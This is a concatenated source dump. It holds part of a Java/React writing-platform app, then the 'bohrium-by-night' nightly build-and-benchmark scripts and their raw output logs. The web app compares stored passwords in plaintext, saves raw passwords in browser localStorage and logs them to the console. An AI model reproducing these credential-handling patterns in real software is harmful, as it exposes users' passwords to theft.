for (Integer tagId : data.getTags()) {
success = (jdbcTemplate.update("insert into profile_interests values (?, ?, ?)", data.getUid(), data.getName(), tagId) > 0) && success;
}
return success;
}
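// Compares the supplied password with the stored one and returns the user id together with a success flag.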
@Override
public Map<String, Object> checkUserCreds(String username, String password) {
Integer userId = jdbcTemplate.queryForObject("select user_id from users_table where username = ?",
new Object[]{username}, (rs, rn) -> rs.getInt(1));
String passdb = jdbcTemplate.queryForObject("select passwd from auth_helper_userauths where user_id = ?",
new Object[]{userId},
(rs, rn) -> rs.getString(1));
assert passdb != null;
Boolean success = passdb.equals(password);
Map<String, Object> res = new HashMap<>();
res.put("userId", userId);
res.put("success", success);
return res;
}
}
<file_sep>import React from 'react';
import { Link } from 'react-router-dom';
import Snackbar from '@material-ui/core/Snackbar';
import MuiAlert, { AlertProps } from '@material-ui/lab/Alert';
import { useHistory } from 'react-router-dom';
import serverUrl from "./appconfig";
function Alert(props) {
return <MuiAlert elevation={6} variant="filled" {...props} />
}
class Tag extends React.Component {
constructor(props) {
super(props);
}
render() {
return (
<div className="inline-block mb-3 mr-2"><span className="inline-block py-1 px-3 rounded bg-gray-800 text-gray-500 text-xs font-medium tracking-widest">{this.props.tagName}</span></div>
);
}
}
class Post extends React.Component {
constructor(props) {
super(props);
console.log(this.props.feedType);
// process the content to show a truncated content
var string = this.props.content.replace('\n', " ");
var length = 305;
var processedContent = string.length > length ?
string.substring(0, length - 3) + "..." : string;
// process the title to show a truncated title
length = 55;
string = this.props.title;
var processedTitle = string.length > length ?
string.substring(0, length - 3) + "..." : string;
this.state = {
successSnkOpen: false,
failedSnkOpen: false,
warnSnkOpen: false,
errorText: '',
successText: '',
warnText: '',
content: processedContent,
title: processedTitle
};
this.handleReadMore = this.handleReadMore.bind(this);
}
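// When the post is opened from the feed, tell the backend to mark it as seen for this user.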
handleReadMore() {
if (this.props.feedType == true)
fetch(serverUrl + "/posts/setseen", {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
userId: window.localStorage.getItem("wKuid"),
postId: this.props.id,
})
})
}
render() {
return (
<div className="p-12 md:w-1/2 flex flex-col items-start border-dashed">
<h2 className="sm:text-3xl text-2xl title-font font-medium text-white mt-4 mb-4">{this.state.title}</h2>
<p className="leading-relaxed mb-4">{this.state.content}</p>
<div
className="flex flex-col items-start flex-wrap pb-4 mb-4 border-b-2 border-gray-800 mt-auto w-full">
<Link to={{
pathname: '/post',
query: {postId: this.props.id, fromFeed: this.props.feedType}
}} className="text-purple-500 inline-flex items-center mb-8">Read
<svg className="w-4 h-4 ml-2" viewBox="0 0 24 24" stroke="currentColor"
stroke-width="2" fill="none" stroke-linecap="round" stroke-linejoin="round">
<path d="M5 12h14"></path>
<path d="M12 5l7 7-7 7"></path>
</svg>
</Link>
<div className="grid-flow-row">
{this.props.tags.map((tag) =>
<div className="inline-block mb-3 mr-2"><span className="inline-block py-1 px-3 rounded bg-gray-800 text-gray-500 text-xs font-medium tracking-widest">{tag.replace("_", " ").toUpperCase()}</span></div>
)}
</div>
<div className="text-gray-600 mr-3 inline-flex items-center ml-auto leading-none text-sm">
<span
className="text-gray-600 mr-3 inline-flex items-center ml-auto leading-none text-sm pr-3 py-1 border-r-2 border-gray-800">
<svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg">
<path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M14 10h4.764a2 2 0 011.789 2.894l-3.5 7A2 2 0 0115.263 21h-4.017c-.163 0-.326-.02-.485-.06L7 20m7-10V5a2 2 0 00-2-2h-.095c-.5 0-.905.405-.905.905 0 .714-.211 1.412-.608 2.006L7 11v9m7-10h-2M7 20H5a2 2 0 01-2-2v-6a2 2 0 012-2h2.5">
</path>
</svg>{this.props.nPosReactions}
<span className="ml-4"></span>
<svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg">
<path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M10 14H5.236a2 2 0 01-1.789-2.894l3.5-7A2 2 0 018.736 3h4.018a2 2 0 01.485.06l3.76.94m-7 10v5a2 2 0 002 2h.096c.5 0 .905-.405.905-.904 0-.715.211-1.413.608-2.008L17 13V4m-7 10h2m5-10h2a2 2 0 012 2v6a2 2 0 01-2 2h-2.5">
</path>
</svg>{this.props.nNegReactions}
</span>
<span className="text-gray-600 inline-flex items-center leading-none text-sm">
<svg className="w-4 h-4 mr-1" stroke="currentColor" stroke-width="2" fill="none"
stroke-linecap="round" stroke-linejoin="round" viewBox="0 0 24 24">
<path
d="M21 11.5a8.38 8.38 0 01-.9 3.8 8.5 8.5 0 01-7.6 4.7 8.38 8.38 0 01-3.8-.9L3 21l1.9-5.7a8.38 8.38 0 01-.9-3.8 8.5 8.5 0 014.7-7.6 8.38 8.38 0 013.8-.9h.5a8.48 8.48 0 018 8v.5z">
</path>
</svg>{this.props.nComments}
</span>
</div>
</div>
<a className="inline-flex items-center">
<span className="flex-grow flex flex-col pl-4">
<span className="title-font font-medium text-white">{this.props.viewReqType ? ('Author: ' + (this.props.anonymous ? 'anonymous' : this.props.postedbyUsername) + ', sent by ' + this.props.sentbyUsername) : (this.props.anonymous ? '<anonymous>' : this.props.postedbyUsername) }</span>
</span>
</a>
<Snackbar open={this.state.successSnkOpen} autoHideDuration={2000} onClose={() => this.setState({ successSnkOpen: false })}>
<Alert onClose={() => this.setState({ successSnkOpen: false })} severity="success">
{this.state.successText}
</Alert>
</Snackbar>
<Snackbar open={this.state.failedSnkOpen} autoHideDuration={2000} onClose={() => this.setState({ failedSnkOpen: false })}>
<Alert onClose={() => this.setState({ failedSnkOpen: false })} severity="error">
{this.state.errorText}
</Alert>
</Snackbar>
<Snackbar open={this.state.warnSnkOpen} autoHideDuration={2000} onClose={() => this.setState({ warnSnkOpen: false })}>
<Alert onClose={() => this.setState({ warnSnkOpen: false })} severity="warning">
{this.state.warnText}
</Alert>
</Snackbar>
</div>
);
}
}
export default Post;<file_sep>import React from 'react';
import serverUrl from './appconfig';
import { Link, Redirect } from 'react-router-dom';
import logo from './public/assets/logo.png';
//import './App.css';
import './css/build/tailwind.css';
import Snackbar from '@material-ui/core/Snackbar';
import MuiAlert, { AlertProps } from '@material-ui/lab/Alert';
import { useHistory } from 'react-router-dom';
import Feed from './ViewRequestsPage';
function Alert(props) {
return <MuiAlert elevation={6} variant="filled" {...props} />
}
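// Landing: if credentials are cached in localStorage, go straight to the feed; otherwise show the sign-in page.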
function Landing() {
var username = '';
var halfkey = '';
var password = '';
if (window.localStorage) {
username = window.localStorage.getItem('wKusername');
password = window.localStorage.getItem('wKpassword');
}
console.log(username)
console.log(password)
if (username == '' || username == null || password == '' || password == null) {
return <SignInPage />;
}
else {
return <Redirect to="/feed" />
}
}
class SignInPage extends React.Component {
constructor(props) {
super(props);
this.state = {
username: '',
password: '',
successSnkOpen: false,
failedSnkOpen: false,
warnSnkOpen: false,
errorText: '',
successText: '',
warnText: '',
};
this.handleSubmit = this.handleSubmit.bind(this);
this.handleChange = this.handleChange.bind(this);
}
handleSubmit() {
if (!this.state.username || !this.state.password) {
this.setState({
errorText: 'Please enter the password and username!',
failedSnkOpen: true,
});
return;
}
if (window.localStorage) {
console.log(JSON.stringify({ username: this.state.username, password: this.state.password }));
fetch(serverUrl + "/users/checksignin", {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ password: this.state.password, username: this.state.username })
}).then(response => {
if (response.status == 200) {
window.localStorage.setItem('wKusername', this.state.username);
window.localStorage.setItem('wKpassword', this.state.password);
response.json().then((data) => {
console.log(data)
if (data.success) {
window.localStorage.setItem('wKuid', data.userId);
this.setState({
successText: 'Signed in successfully!',
successSnkOpen: true,
});
window.setTimeout(() => this.props.history.push('/feed'), 1000);
}
else {
this.setState({
errorText: 'Invalid username/password!',
failedSnkOpen: true,
});
}
});
}
else if (response.status == 401) {
this.setState({
errorText: 'Invalid username/password!',
failedSnkOpen: true,
});
}
}).catch(() => {
});
}
//window.localStorage.setItem('wKuid', data.userId);
/*this.setState({
successText: 'Signed in successfully!',
successSnkOpen: true,
});
window.setTimeout(() => this.props.history.push('/feed'), 1000);*/
}
handleChange(event) {
const target = event.target;
const value = target.type === 'checkbox' ? target.checked : target.value;
const optionName = target.name;
this.setState(state => ({
[optionName]: value
}));
}
render() {
return (
<div className="flex flex-col h-screen bg-gray-900">
<nav className="bg-gray-800">
<div className="max-w-7xl mx-auto px-2 sm:px-6 lg:px-8">
<div className="relative flex items-center justify-between h-16">
<div className="absolute inset-y-0 left-0 flex items-center sm:hidden">
{/* Mobile menu button*/}
</div>
<div className="flex-1 flex items-center justify-center sm:items-stretch sm:justify-start">
<div className="flex-shrink-0">
<img className="block lg:hidden h-8 w-auto" src={logo} alt="wK logo" />
<img className="hidden lg:block h-8 w-auto" src={logo} alt="wK logo" />
</div>
<div className="hidden sm:block sm:ml-6">
</div>
</div>
<div className="absolute inset-y-0 right-0 flex items-center pr-2 sm:static sm:inset-auto sm:ml-6 sm:pr-0">
<button className="p-1 border-2 border-transparent text-gray-400 rounded-full hover:text-white focus:outline-none focus:text-white focus:bg-gray-700 transition duration-150 ease-in-out" aria-label="Notifications">
{/* Heroicon name: bell */}
</button>
{/* Profile dropdown */}
<div className="ml-3 relative">
<div>
</div>
{/*
Profile dropdown panel, show/hide based on dropdown state.
Entering: "transition ease-out duration-100"
From: "transform opacity-0 scale-95"
To: "transform opacity-100 scale-100"
Leaving: "transition ease-in duration-75"
From: "transform opacity-100 scale-100"
To: "transform opacity-0 scale-95"
*/}
<div className="hidden origin-top-right absolute right-0 mt-2 w-48 rounded-md shadow-lg">
</div>
</div>
</div>
</div>
</div>
{/*
Mobile menu, toggle classes based on menu state.
Menu open: "block", Menu closed: "hidden"
*/}
<div className="hidden sm:hidden">
</div>
</nav>
<main className="flex-grow">
<section className="text-gray-500 bg-gray-900 body-font">
<div className="container px-5 py-24 mx-auto flex flex-wrap items-center">
<div className="lg:w-3/5 md:w-1/2 md:pr-16 lg:pr-0 pr-0">
<h1 className="title-font font-semibold text-3xl text-white">The outlet for all your creative ideas and literary grace isn't just the diary.</h1>
<p className="leading-relaxed mt-4">Ever thought of wanting to share all those ideas popping in your
head? All those ideas that pop up into your head in the shower, or while dining alone?
Well, now you have a platform to share all that with the world.
<br /><p className="leading-relaxed mt-4">Because we all know that a <i>diary</i> just isn't the place deserved by your magnificent ideas.</p>
<p className="mt-4"></p><span className="text-indigo-500 font-semibold">Writer's Kalice</span> is the place for the literary genius that hides within you that never stepped out of the lonely confines of your diary till now. </p>
</div>
<div className="lg:w-2/6 md:w-1/2 bg-gray-800 rounded-lg p-8 flex flex-col md:ml-auto w-full mt-10 md:mt-0">
<h2 className="text-white text-lg font-medium title-font mb-5">Sign In</h2>
<input className="bg-gray-900 rounded border font-mono tracking-widest text-white border-gray-900 focus:outline-none focus:border-purple-500 text-base px-4 py-2 mb-4" placeholder="Username" type="text" name="username" onChange={this.handleChange} />
<input type="password" className="bg-gray-900 tracking-widest rounded border font-mono text-white border-gray-900 focus:outline-none focus:border-purple-500 text-base px-4 py-2 mb-4" placeholder="Password" name="password" onChange={this.handleChange} />
<p><br /><br /></p>
{/*<p className="text-sm text-gray-600 mb-6"><a className="text-purple-500 inline-flex items-center" href="#" onClick={() => { this.setState({ warnText: 'Planned for the future!', warnSnkOpen: true }) }}>Forgot password?</a></p>*/}
<button className="text-white bg-purple-500 border-0 py-2 px-8 focus:outline-none hover:bg-purple-600 rounded text-lg" onClick={this.handleSubmit}>
Open Sesame!
</button>
<p className="text-sm text-gray-600 mt-6">If you don't have an account yet,
<Link to="/signup"><a className="text-purple-500 inline-flex items-center" href="/signup">sign up here.</a></Link></p>
</div>
</div>
</section>
</main>
<footer className="text-gray-500 bg-gray-900 body-font">
<div className="container px-5 py-8 mx-auto flex items-center sm:flex-row flex-col">
<a className="flex title-font font-medium items-center md:justify-start justify-center text-white">
{/*<svg xmlns="http://www.w3.org/2000/svg" fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" className="w-10 h-10 text-white p-2 bg-green-500 rounded-full" viewBox="0 0 24 24">
<path d="M12 2L2 7l10 5 10-5-10-5zM2 17l10 5 10-5M2 12l10 5 10-5"></path>
</svg>
<span className="ml-3 text-xl">Writer's Kalice</span>*/}
<img src={logo} className="h-10" />
</a>
{/*<p className="text-sm text-gray-600 sm:ml-4 sm:pl-4 sm:border-l-2 sm:border-gray-800 sm:py-2 sm:mt-0 mt-4">© 2020 tailblocks —
<a href="https://twitter.com/knyttneve" className="text-gray-500 ml-1" target="_blank" rel="noopener noreferrer">@knyttneve</a>
</p>*/}
<span className="inline-flex sm:ml-auto sm:mt-0 mt-4 justify-center sm:justify-start">
<a className="text-gray-600">
<svg fill="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" className="w-5 h-5" viewBox="0 0 24 24">
<path d="M18 2h-3a5 5 0 00-5 5v3H7v4h3v8h4v-8h3l1-4h-4V7a1 1 0 011-1h3z"></path>
</svg>
</a>
<a className="ml-3 text-gray-600">
<svg fill="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" className="w-5 h-5" viewBox="0 0 24 24">
<path d="M23 3a10.9 10.9 0 01-3.14 1.53 4.48 4.48 0 00-7.86 3v1A10.66 10.66 0 013 4s-4 9 5 13a11.64 11.64 0 01-7 2c9 5 20 0 20-11.5a4.5 4.5 0 00-.08-.83A7.72 7.72 0 0023 3z"></path>
</svg>
</a>
<a className="ml-3 text-gray-600">
<svg fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" className="w-5 h-5" viewBox="0 0 24 24">
<rect width="20" height="20" x="2" y="2" rx="5" ry="5"></rect>
<path d="M16 11.37A4 4 0 1112.63 8 4 4 0 0116 11.37zm1.5-4.87h.01"></path>
</svg>
</a>
<a className="ml-3 text-gray-600">
<svg fill="currentColor" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="0" className="w-5 h-5" viewBox="0 0 24 24">
<path stroke="none" d="M16 8a6 6 0 016 6v7h-4v-7a2 2 0 00-2-2 2 2 0 00-2 2v7h-4v-7a6 6 0 016-6zM2 9h4v12H2z"></path>
<circle cx="4" cy="4" r="2" stroke="none"></circle>
</svg>
</a>
</span>
</div>
</footer>
<Snackbar open={this.state.successSnkOpen} autoHideDuration={2000} onClose={() => this.setState({ successSnkOpen: false })}>
<Alert onClose={() => this.setState({ successSnkOpen: false })} severity="success">
{this.state.successText}
</Alert>
</Snackbar>
<Snackbar open={this.state.failedSnkOpen} autoHideDuration={2000} onClose={() => this.setState({ failedSnkOpen: false })}>
<Alert onClose={() => this.setState({ failedSnkOpen: false })} severity="error">
{this.state.errorText}
</Alert>
</Snackbar>
<Snackbar open={this.state.warnSnkOpen} autoHideDuration={2000} onClose={() => this.setState({ warnSnkOpen: false })}>
<Alert onClose={() => this.setState({ warnSnkOpen: false })} severity="warning">
{this.state.warnText}
</Alert>
</Snackbar>
</div>
);
}
}
// //export default SignInPage;
export default Landing;<file_sep>import Chip from '@material-ui/core/Chip';
import React from 'react';
export default class InterestChip extends React.Component {
constructor(props) {
super(props);
this.state = {
on: false
};
this.handleClick = this.handleClick.bind(this);
}
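// Toggles the chip's selected state and notifies the parent through the onOn/onOff callbacks.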
handleClick() {
if (this.state.on) {
this.props.onOff();
this.setState(state => ({
on: false
}));
}
else {
this.props.onOn();
this.setState(state => ({
on: true
}));
}
}
render() {
return (
<div className="inline-block mb-3 mr-2"><Chip label={this.props.text} onClick={this.handleClick} variant={this.state.on ? 'default' : 'outlined'} color="primary" /></div>
);
}
}
|
4d183b84fde511895493dacf08f59a8c4d6b2598
|
[
"JavaScript",
"Java",
"Markdown",
"SQL"
] | 22
|
Java
|
souris-dev/Writers-Kalice
|
02b0387ae0ae3f780587242212b25a8e560b7697
|
c61050be4e2776207e55ccd3e43fd348e8667e8f
|
refs/heads/master
|
<repo_name>bh107/bohrium-by-night<file_sep>/benchmark/raw_output/snakes_and_ladders-NumPy-cpu.rst
Raw Benchmark Output
====================
Running Snakes and Ladders on Octuplets using NumPy/CPU
commit: `#<KEY> <https://bitbucket.org/bohrium/bohrium/commits/<KEY>>`_,
time: 2014-11-18 14:15:52.338679.
command: ``python benchmark/Python/snakes_and_ladders.py --size=1000*10 --bohrium=False``
Run 00
~~~~~~
stdout::
benchmark/Python/snakes_and_ladders.py - target: None, bohrium: False, size: 1000*10, elapsed-time: 4.595140
stderr::
N/A
<file_sep>/run_test.py
#!/usr/bin/env python
import subprocess
import argparse
import json
import sys
import os
import tempfile
def bash_cmd(cmd, cwd=None):
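"""Run a shell command (optionally in 'cwd'), echoing the command and its stdout/stderr."""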
print cmd
p = subprocess.Popen(
cmd,
stdout = subprocess.PIPE,
stderr = subprocess.PIPE,
shell = True,
cwd=cwd
)
out, err = p.communicate()
print out,
print err,
def parser_bohrium_src(parser, path):
"""Check that 'path' points to the Bohrium source dir"""
path = os.path.expanduser(path)
if os.path.isdir(path):
return os.path.abspath(path)
else:
parser.error("The path %s does not exist!"%path)
def parser_is_file(parser, path):
"""Check that 'path' points to a file"""
path = os.path.expanduser(path)
if os.path.isfile(path):
return os.path.abspath(path)
else:
parser.error("The path %s does not point to a file!"%path)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Run the test suite and generate a rst-file.', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'bohrium_src',
help='Path to the Bohrium source-code.',
type=lambda x: parser_bohrium_src(parser, x)
)
parser.add_argument(
'benchpress_src',
help='Path to the Benchpress source-code.',
type=lambda x: parser_bohrium_src(parser, x)
)
parser.add_argument(
'--ssh-key',
default="~/.ssh/bhbuilder_rsa",
help='The ssh key to use when accessing the git repos',
type=lambda x: parser_is_file(parser, x)
)
parser.add_argument(
'--no-slurm',
action="store_true",
help="Disable the use of SLURM -- the test runs locally"
)
args = parser.parse_args()
if args.no_slurm:
slurm = ''
else:
slurm = '--slurm'
tmpdir = tempfile.mkdtemp()
tmpdir_root = tmpdir
#Lets update the bohrium and benchpress repos
bash_cmd("git pull", cwd=args.bohrium_src)
bash_cmd("git pull", cwd=args.benchpress_src)
#We build and install bohrium in ~/.local
bash_cmd("mkdir -p build && cd build && cmake -DCMAKE_BUILD_TYPE=RelWithDebInfo .."\
" && make install", cwd=args.bohrium_src)
#First we run/submit the test suite
bash_cmd("ssh-agent bash -c 'ssh-add ~/.ssh/bhbuilder_rsa; "\
"git clone <EMAIL>:bohrium/bohrium-by-night.git'", cwd=tmpdir)
tmpdir += "/bohrium-by-night" #move to the git repos
cmd = "./press.py %s suites/numpytest.py --no-perf --wait --runs 1 %s --publish-cmd='mv $OUT "\
"%s/test/numpytest.py.json'"%(args.bohrium_src, slurm, tmpdir)
bash_cmd(cmd, cwd=args.benchpress_src)
#Then we commit the result
bash_cmd("git add test/numpytest.py.json", cwd=tmpdir)
bash_cmd("git commit -m 'nightly-test'", cwd=tmpdir)
bash_cmd("ssh-agent bash -c 'ssh-add ~/.ssh/bhbuilder_rsa; git push'", cwd=tmpdir)
#Finally we generate and commits the reStructuredText file
with open("%s/test/numpytest.py.json"%tmpdir, 'r') as f:
data = json.load(f)
meta = data['meta']
#Write header
rst = \
"""
Python Test Suite
=================
Running %s on Octuplets
commit: `#%s <https://bitbucket.org/bohrium/bohrium/commits/%s>`_,
time: %s.
"""%(meta['suite'], meta['rev'], meta['rev'], meta['started'])
#Write the runs
for r in data['runs']:
rst += "The %s results::\n\n"%r['engine_alias']
for o,e in zip(r['stdout'],r['stderr']):
o = o.replace("\n", "\n ")
e = e.replace("\n", "\n ")
rst += " %s\n %s\n"%(o,e)
print rst
with open("%s/test/numpytest.py.rst"%tmpdir,'w') as f:
f.write(rst)
bash_cmd("git add %s/test/numpytest.py.rst"%tmpdir, cwd=tmpdir)
bash_cmd("git commit -m 'nightly-test-rst'", cwd=tmpdir)
bash_cmd("ssh-agent bash -c 'ssh-add ~/.ssh/bhbuilder_rsa; git push'", cwd=tmpdir)
bash_cmd("rm -Rf %s"%tmpdir_root)
<file_sep>/benchmark/raw_output/jacobi_stencil-Bohrium-cpu.rst
Raw Benchmark Output
====================
Running Jacobi Stencil on Octuplets using Bohrium/CPU
commit: `#369b33555f0b3b45fc0dde490cf2f7340b51843f <https://bitbucket.org/bohrium/bohrium/commits/369b33555f0b3b45fc0dde490cf2f7340b51843f>`_,
time: 2015-04-19 04:05:42.450102.
command: ``/usr/bin/time -v -o /home/bhbuilder/benchpress/bh-job-f4a09aa2-acc3-42b0-abff-422ae3384c2c.sh-2.time python benchmark/python/jacobi_stencil.py --size=3000*3000*100 --bohrium=True``
Run 00
~~~~~~
stdout::
N/A
stderr::
Error in [node:impl]: /home/bhbuilder/.local/lib/libbh_vem_node.so: cannot open shared object file: No such file or directory
Run 01
~~~~~~
stdout::
N/A
stderr::
Error in [node:impl]: /home/bhbuilder/.local/lib/libbh_vem_node.so: cannot open shared object file: No such file or directory
Run 02
~~~~~~
stdout::
N/A
stderr::
Error in [node:impl]: /home/bhbuilder/.local/lib/libbh_vem_node.so: cannot open shared object file: No such file or directory
<file_sep>/benchmark/raw_output/convolve_2d-NumPy-cpu.rst
Raw Benchmark Output
====================
Running Convolution 2D on Octuplets using NumPy/CPU
commit: `#0e67b7b00f693b98b768cfc3d3c85c2370605c86 <https://bitbucket.org/bohrium/bohrium/commits/0e67b7b00f693b98b768cfc3d3c85c2370605c86>`_,
time: 2014-11-18 13:40:32.472579.
command: ``python benchmark/Python/convolve_2d.py --size=5 --bohrium=False``
Run 00
~~~~~~
stdout::
N/A
stderr::
Traceback (most recent call last):
File "benchmark/Python/convolve_2d.py", line 61, in <module>
main()
File "benchmark/Python/convolve_2d.py", line 52, in main
image, image_filter = convolve_2d_init(N)
File "benchmark/Python/convolve_2d.py", line 31, in convolve_2d_init
img = Image.open(photo)
File "/usr/lib/python2.7/dist-packages/PIL/Image.py", line 1996, in open
fp = builtins.open(fp, "rb")
IOError: [Errno 2] No such file or directory: '/tmp/Hell.jpg'
<file_sep>/run_benchmark.py
#!/usr/bin/env python
import subprocess
import argparse
import json
import sys
import os
import tempfile
def bash_cmd(cmd, cwd=None):
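"""Run a shell command (optionally in 'cwd'), echoing the command and its stdout/stderr."""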
print cmd
p = subprocess.Popen(
cmd,
stdout = subprocess.PIPE,
stderr = subprocess.PIPE,
shell = True,
cwd=cwd
)
out, err = p.communicate()
print out,
print err,
def parser_bohrium_src(parser, path):
"""Check that 'path' points to the Bohrium source dir"""
path = os.path.expanduser(path)
if os.path.isdir(path):
return os.path.abspath(path)
else:
parser.error("The path %s does not exist!"%path)
def parser_is_file(parser, path):
"""Check that 'path' points to a file"""
path = os.path.expanduser(path)
if os.path.isfile(path):
return os.path.abspath(path)
else:
parser.error("The path %s does not point to a file!"%path)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Run the benchmark suite and generate a rst-file.', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'bohrium_src',
help='Path to the Bohrium source-code.',
type=lambda x: parser_bohrium_src(parser, x)
)
parser.add_argument(
'benchpress_src',
help='Path to the Benchpress source-code.',
type=lambda x: parser_bohrium_src(parser, x)
)
parser.add_argument(
'--ssh-key',
default="~/.ssh/bhbuilder_rsa",
help='The ssh key to use when accessing the git repos',
type=lambda x: parser_is_file(parser, x)
)
parser.add_argument(
'--no-slurm',
action="store_true",
help="Disable the use of SLURM -- the benchmark runs locally"
)
args = parser.parse_args()
if args.no_slurm:
slurm = ''
else:
slurm = '--slurm'
tmpdir = tempfile.mkdtemp()
tmpdir_root = tmpdir
#Lets update the bohrium and benchpress repos
bash_cmd("git pull", cwd=args.bohrium_src)
bash_cmd("git pull", cwd=args.benchpress_src)
#We build and install bohrium in ~/.local
bash_cmd("mkdir -p build && cd build && cmake -DCMAKE_BUILD_TYPE=RelWithDebInfo .."\
" && make install", cwd=args.bohrium_src)
#We run/submit the benchmark suite
bash_cmd("ssh-agent bash -c 'ssh-add ~/.ssh/bhbuilder_rsa; "\
"git clone <EMAIL>:bohrium/bohrium-by-night.git'", cwd=tmpdir)
tmpdir += "/bohrium-by-night" #move to the git repos
cmd = "./press.py %s suites/daily_benchmark.py --no-perf --wait --runs 3 %s --publish-cmd='mv $OUT "\
"%s/benchmark/daily.py.json'"%(args.bohrium_src, slurm, tmpdir)
print cmd
bash_cmd(cmd, cwd=args.benchpress_src)
#We commit the result
bash_cmd("git add benchmark/daily.py.json", cwd=tmpdir)
bash_cmd("git commit -m 'nightly-benchmark'", cwd=tmpdir)
bash_cmd("ssh-agent bash -c 'ssh-add ~/.ssh/bhbuilder_rsa; git push'", cwd=tmpdir)
#We generate and commit graphs
bash_cmd("./gen.graphs.py --type=daily %s/benchmark/daily.py.json "\
"--output %s/benchmark/gfx"%(tmpdir,tmpdir), cwd=args.benchpress_src)
bash_cmd("git add benchmark/gfx", cwd=tmpdir)
bash_cmd("git commit -m 'nightly-benchmark-gfx'", cwd=tmpdir)
bash_cmd("ssh-agent bash -c 'ssh-add ~/.ssh/bhbuilder_rsa; git push'", cwd=tmpdir)
#We generate the raw output reStructuredText files
with open("%s/benchmark/daily.py.json"%tmpdir, 'r') as f:
data = json.load(f)
meta = data['meta']
#We write one rst-file per command
for script in set([d['script'] for d in data['runs']]):
for r in data['runs']:
if script == r['script']:
#Write header
rst = \
"""
Raw Benchmark Output
====================
Running %s on Octuplets using %s/%s
commit: `#%s <https://bitbucket.org/bohrium/bohrium/commits/%s>`_,
time: %s.
command: ``%s``
"""%(r['script_alias'], r['bridge_alias'], r['engine_alias'], meta['rev'],\
meta['rev'], meta['started'], ' '.join(r['cmd']))
#Write all outputs
i = 0
for o, e in zip(r['stdout'], r['stderr']):
if len(o) == 0:
o = "N/A"
if len(e) == 0:
e = "N/A"
rst += "Run %02d\n~~~~~~\n"%i
rst += " stdout::\n\n %s\n\n"%(o.replace("\n","\n "))
rst += " stderr::\n\n %s\n\n"%(e.replace("\n","\n "))
rst += "\n\n"
i += 1
filename = "%s/benchmark/raw_output/%s-%s-%s.rst"%(tmpdir,r['script'],\
r['bridge_alias'].replace(" ", "-"),r['engine'])
with open(filename,'w') as f:
f.write(rst)
bash_cmd("git add %s"%filename, cwd=tmpdir)
bash_cmd("git commit -m 'nightly-benchmark-raw-output'", cwd=tmpdir)
bash_cmd("ssh-agent bash -c 'ssh-add ~/.ssh/bhbuilder_rsa; git push'", cwd=tmpdir)
#Finally we generate and commits the reStructuredText file
with open("%s/benchmark/daily.py.json"%tmpdir, 'r') as f:
data = json.load(f)
meta = data['meta']
#Write header
rst = \
"""
Python Benchmark Suite
======================
Running %s on Octuplets
commit: `#%s <https://bitbucket.org/bohrium/bohrium/commits/%s>`_,
time: %s.
"""%(meta['suite'], meta['rev'], meta['rev'], meta['started'])
#We handle one script at a time
for script in set([d['script'] for d in data['runs']]):
for r in data['runs']:
if script == r['script']:
#Write title
rst += "%s\n"%r['script_alias']
rst += "-"*len(r['script_alias']) + "\n\n"
break
#Write the executed commands
for r in data['runs']:
if script == r['script']:
rst += "`%s/%s <raw_output/%s-%s-%s.rst>`_:"%(r['bridge_alias'], \
r['engine_alias'], r['script'], \
r['bridge_alias'].replace(" ", "-"),r['engine'])
rst += " ``%s``\n\n"%(' '.join(r['cmd']))
rst += "\n\n"
#Write the graphs
rst += ".. image:: https://bytebucket.org/bohrium/bohrium-by-night"\
"/raw/master/benchmark/gfx/%s_runtime.png\n\n"%script
with open("%s/benchmark/daily.py.rst"%tmpdir,'w') as f:
f.write(rst)
bash_cmd("git add %s/benchmark/daily.py.rst"%tmpdir, cwd=tmpdir)
bash_cmd("git commit -m 'nightly-benchmark-rst'", cwd=tmpdir)
bash_cmd("ssh-agent bash -c 'ssh-add ~/.ssh/bhbuilder_rsa; git push'", cwd=tmpdir)
bash_cmd("rm -Rf %s"%tmpdir_root)
<file_sep>/benchmark/raw_output/convolve_3d-NumPy-cpu.rst
Raw Benchmark Output
====================
Running Convolution 3D on Octuplets using NumPy/CPU
commit: `#369b33555f0b3b45fc0dde490cf2f7340b51843f <https://bitbucket.org/bohrium/bohrium/commits/369b33555f0b3b45fc0dde490cf2f7340b51843f>`_,
time: 2015-04-19 04:05:42.450102.
command: ``/usr/bin/time -v -o /home/bhbuilder/benchpress/bh-job-cdce2174-61f5-4a36-9c65-68a2d5adf952.sh-2.time python benchmark/python/convolve_3d.py --size=100 --bohrium=False``
Run 00
~~~~~~
stdout::
N/A
stderr::
Traceback (most recent call last):
File "benchmark/python/convolve_3d.py", line 59, in <module>
main()
File "benchmark/python/convolve_3d.py", line 50, in main
image, image_filter = convolve_3d_init(N, B)
File "benchmark/python/convolve_3d.py", line 33, in convolve_3d_init
kernel = gen_3d_filter(fsize, 13.0)
File "benchmark/python/convolve_3d.py", line 23, in gen_3d_filter
kernel[filterZ + kernelrad, filterY + kernelrad,filterX + kernelrad] = caleuler * np.exp(-distance)
IndexError: index 100 is out of bounds for axis 2 with size 100
Error in [node:impl]: /home/bhbuilder/.local/lib/libbh_vem_node.so: cannot open shared object file: No such file or directory
Run 01
~~~~~~
stdout::
N/A
stderr::
Traceback (most recent call last):
File "benchmark/python/convolve_3d.py", line 59, in <module>
main()
File "benchmark/python/convolve_3d.py", line 50, in main
image, image_filter = convolve_3d_init(N, B)
File "benchmark/python/convolve_3d.py", line 33, in convolve_3d_init
kernel = gen_3d_filter(fsize, 13.0)
File "benchmark/python/convolve_3d.py", line 23, in gen_3d_filter
kernel[filterZ + kernelrad, filterY + kernelrad,filterX + kernelrad] = caleuler * np.exp(-distance)
